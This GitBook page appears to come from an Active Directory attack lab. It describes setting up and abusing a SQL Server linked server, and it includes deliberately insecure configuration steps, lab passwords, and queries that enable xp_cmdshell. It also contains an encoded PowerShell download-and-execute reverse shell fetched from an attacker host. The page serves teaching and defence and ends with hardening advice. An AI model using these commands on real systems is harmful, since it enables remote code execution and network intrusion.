📖
Building a Windows AD lab
  • Building a Windows AD lab
  • Lab-setup
    • Lab overview
    • Building the lab
      • Prerequisite
      • Creating images
        • Optional: Install software & Settings
      • Network setup
      • Cloning & Creating VM's
      • Creating bank.local
        • Creating Domain Controller - DC01
          • Enable RDP
        • Creating amsterdam.bank.local
          • Creating Domain Controller - DC02
            • Creating a AD structure
            • Create a CA
            • Configure LDAPS
          • Creating Fileserver - FILE01
            • File services
          • Creating W10 client - WS01
            • PSRemoting
          • Creating Webserver - WEB01
            • Web Services
            • SQL Server
              • Create database
      • Creating secure.local
        • Creating Domain Controller - DC03
        • Creating File/SQL Server - DATA01
          • SQL Server
            • Create database
    • Attack Paths
      • Attack path 1 (hard)
        • Configuring
        • Tasks
        • Manual
      • Attack path 2
        • Configuring
        • Task
        • Manual
    • Troubleshooting
    • To-Do
  • Vulnerabilities & Misconfigurations & Attacks
    • Initial Access Attacks
      • Username Enumeration
        • Password Spraying
        • AS-REP Roasting
        • Empty Password
      • SMB Relaying
      • SMB Null-Session (To-Do)
      • SQL Server default login
    • Active Directory Attacks
      • Password spraying
      • AS-REP Roasting
      • Empty password
      • Password in description
      • Kerberoasting
      • Delegation Attacks
        • Unconstrained Delegation
          • Printerbug
        • Constrained Delegation
        • Resource Based Constrained Delegation
          • Computeraccount Takeover
          • Change-LockScreen
          • Webclient Attack (todo)
      • DACL-Abuses
        • Write Owner
        • Owns
        • WriteDacl
        • GenericAll
        • GenericWrite (todo)
        • ForceChangePassword
        • Add user to group (todo)
        • Targeted Kerberoast (todo)
        • Get-Changes
      • Reused local administrator (todo)
      • SQL Server Attacks (todo)
        • Initial Access
          • SQL Server default login
          • Normal domain user access
        • Privilege Escalation
          • Impersonation
          • DB-Owner
          • Enumerate Logins
            • Weak passwords
        • Executing Commands
        • Database-Links
        • Capturing hashes & Relaying
      • Reading LAPS passwords (todo)
      • Priviliged Groups (todo)
        • DNS-Admins (todo)
        • Account Operators (todo)
        • Backup Operators
        • Server Operators (todo)
      • Hopping domains and forests
        • Child to parent domain
          • Krbtgt hash
          • Trust key
        • Cross forest Attacks (todo)
          • Foreign user
    • Misc
      • Reverse shell trick
      • Lateral Movement
        • PSRemoting
        • PsExec (todo)
      • Misconfigured Service (todo)
        • Unqouted Service Path
      • Discovering Shares
      • Password on shares
      • Different methods of dumping credentials
        • LSASS (todo)
        • Dumping DPAPI
          • Browser passwords
        • Scheduled tasks (todo)
        • Services (todo)
        • Vssadmin Shadow Copy
      • ms-ds-machineaccountquota (todo)
      • add DNS Records (todo)
      • Bypassing UAC
    • Template page
  • Defence
    • Detection
    • Hardening
      • LDAP
        • LDAP Signing
        • LDAPS Binding
      • Strong Password Policy
      • Change who can join computers to the domain
      • Protected users group
      • Account is sensitive and cannot be delegated
      • Powershell Execution Policy
      • Template page
Powered by GitBook
On this page
  • Configuring
  • Prerequisite
  • Configuring SQL user on Data01
  • Configuring SQL link
  • Attacking
  • How it works
  • Tools
  • Executing the attack
  • Cleanup
  • Defending
  • Recommendations
  • Detection
  • References
Edit on GitHub
  1. Vulnerabilities & Misconfigurations & Attacks
  2. Active Directory Attacks
  3. SQL Server Attacks (todo)

Database-Links

SQL Servers can be configured to link to other SQL Servers.

PreviousExecuting CommandsNextCapturing hashes & Relaying

Last updated 2 years ago

Configuring

Prerequisite

Configuring SQL user on Data01

  1. Login to DATA01 as the Administrator user with password Welcome01!.

  2. Open "Microsoft SQL Server Management Studio".

3. Login with the Administrator user using Windows Authentication.

4. Right click on the server object "Data01\Data (SQL Server 15.0.2000.5)" and select "Properties".

5. Open the "Security" tab and select "SQL Server and Windows Authentication mode" under "Server authentication".

6. Open "SQL Server 2019 Configuration Manager"

7. Restart the two SQL services with "DATA" in their name.

8. Open "Microsoft SQL Server Management Studio".

9. Expand "Security" and "Logins". Then right click on "Logins" and select "New Login".

10. Fill in the login name SQL_link and password Eo6#jAzonQhw . Then make sure the three password flags "Enforce Password policy", "Enforce password expiration" and "User must change password at next login" are unselected.

11. In the tab "Server Roles" select "setupadmin" and "sysadmin" and click "OK".

12. In the tab "User Mapping" select "Bank Transfers".

Configuring SQL link

  1. Login to WEB01 as the Administrator user with password Welcome01!.

  2. Open "Microsoft SQL Server Management Studio".

  3. Login with the Administrator user using Windows Authentication.

  4. Expand the "Server Objects" and "Linked Servers". Then right click on "Linked Servers" and select "New Linked Server".

  5. Fill in Data01.secure.local and select "SQL Server".

6. Open the "Security" tab and select "Be made using this security context". Then fill in the credentials we created in the previous section. SQL_link and password Eo6#jAzonQhw .

7. Open the "Server Options" tab and select True for "RPC Out". This is done so we can enable xp_cmdshell during the attack.

Step 7 could be skipped and then it could be enabled during the attack after getting sa privileges on Web01 database using the following query:

EXEC sp_serveroption @server='DATA01.SECURE.LOCAL', @optname='rpc out', @optvalue='True'

8. Click "OK" and the linked server should show up.

Attacking

How it works

SQL Servers can be linked together to access data on the linked SQL Server. The link is created using a security context, this could be a SQL user or a domain user. The link will have the permissions from the user. If the user has sysadmin privileges it is possible to execute queries as sysadmin.

If xp_cmdshell is enabled on the linked server it is possible to execute commands. Or if RPCOUT is enabled it is possible to enable xp_cmdshell.

Tools

Executing the attack

  1. Download PowerUpSQL on the kali machine and host it on a webserver:

wget https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1
python3 -m http.server 8090

2. Login to WS01 as Richard with the password Sample123.

3. Start PowerShell and download and execute an amsi and PowerUpSQL in memory:

3. With PowerUPSQL and the Get-SQLServerLink cmdlet we can query the SQL Server links from the current domain.

Get-SQLInstanceDomain | Get-SQLServerLink.

4. The output shows that web01.amsterdam.bank.local has a SQL Server link to DATA01.secure.local. A link that is to another domain. The output also shows that rpc_out is enabled. With the cmdlet Get-SQLServerLinkCrawl we can execute a query through the linked servers. 

Get-SQLInstanceDomain | Get-SQLServerLinkCrawl -Query 'select @@version'

We wont see the data from the SQL Query since its wrapped into the CustomQuery object. It is also queried to both SQL Servers.

5. With the parameter -QueryTarget we can select a target instance to query.

Get-SQLInstanceDomain | Get-SQLServerLinkCrawl -Query 'select @@version' -QueryTarget DATA01\DATA | Select-Object -ExpandProperty CustomQuery

Connecting with HeidiSQL

  2. To execute SQL queries and look into the database start heidiSQL.

  3. Click on "New" on the left bottom and configure the following settings:

  • Network Type: Microsoft SQL Server (TCP/IP)

  • Library: SQLOLEDB

  • Hostname / IP: WEB01.amsterdam.bank.local

  • Select: "Use Windows Authentication"

  • Port: 1433

4. Click "OK" on the security Issue warning.

5. In the "Query" tab fill in the following to query the SQL Links:

SELECT * FROM master..sysservers;

6. We discovered the same SQL server link as earlier. We can query the server with the following query:

SELECT * FROM OPENQUERY("DATA01.SECURE.LOCAL", 'select @@version');

7. We can query the server to check if xp_cmdshell is on:

SELECT * FROM OPENQUERY("DATA01.SECURE.LOCAL", 'SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell''');

8. The value 0 means xp_cmdshell is disabled. We can try to enable xp_cmdshell with the following queries:

EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT "DATA01.SECURE.LOCAL"
EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT "DATA01.SECURE.LOCAL"

9. When we check if xp_cmdshell is enabled we see it is enabled now.

10. We can execute commands using the EXECUTE function.

EXECUTE('exec master..xp_cmdshell ''whoami''') AT "DATA01.SECURE.LOCAL"

11. We could get a reverse shell by executing the following query using the technique from:

EXECUTE('exec master..xp_cmdshell ''powershell.exe -w hidden -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIANAA4AC4AMgA6ADgAMAA5ADAALwBhAG0AcwBpAC4AdAB4AHQAIgApADsAIABpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMgA0ADgALgAyADoAOAAwADkAMAAvAEkAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABUAGMAcAAuAHAAcwAxACIAKQA=''') AT "DATA01.SECURE.LOCAL"

Cleanup

  1. Execute the following query in HeidiSQL to disable xp_cmdshell again:

EXEC('sp_configure ''xp_cmdshell'', 0; reconfigure;') AT "DATA01.SECURE.LOCAL"
EXEC('sp_configure ''show advanced options'', 0; reconfigure;') AT "DATA01.SECURE.LOCAL"

Defending

Recommendations

  • Configure the SQL_Link with the least privilege possible, dont use the sysadmin role.

  • Disable xp_cmdshell on the SQL Server.

  • Disable RPC OUT on the SQL Server.

Detection

References

Download on WS01.

PowerupSQL
Heidisql
HeidiSQL
Reverse shell trick
Normal domain user access